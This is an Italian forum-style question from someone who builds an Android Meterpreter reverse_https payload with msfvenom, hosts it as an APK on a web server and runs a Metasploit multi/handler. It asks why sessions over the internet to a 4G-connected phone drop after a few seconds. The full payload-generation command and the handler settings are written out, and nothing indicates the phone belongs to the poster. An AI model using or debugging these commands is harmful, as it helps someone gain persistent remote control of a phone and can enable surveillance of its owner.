Ogni volta che uso un heter metrico inverso su un telefono Android su Internet, viene creata una sessione, ma dopo alcuni secondi si dice che la sessione non è valida e si chiude. Quando lo faccio sulla LAN funziona perfettamente. Quindi qual'è il problema? (Il telefono su cui sto testando il carico utile utilizza la connessione 4G)
Quando creo il carico utile, io uso:
msfvenom -p android/meterpreter/reverse_https LPORT=4444 LHOST=<public_ip> -o /var/www/html/payload.apk.
Su metasploit io uso:
use exploit/multi/handler
set payload android/meterpreter/reverse_https
set lport 4444
set lhost local ip
set luri /
set ExitOnSession false
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0
exploit -j
Dopo tutto questo viene stabilita una connessione ma poi chiusa. E a volte quando creo un nuovo gestore crea sessioni infinite per lo stesso target, continua a crearle finché non chiudo la console, qualcuno può aiutarmi?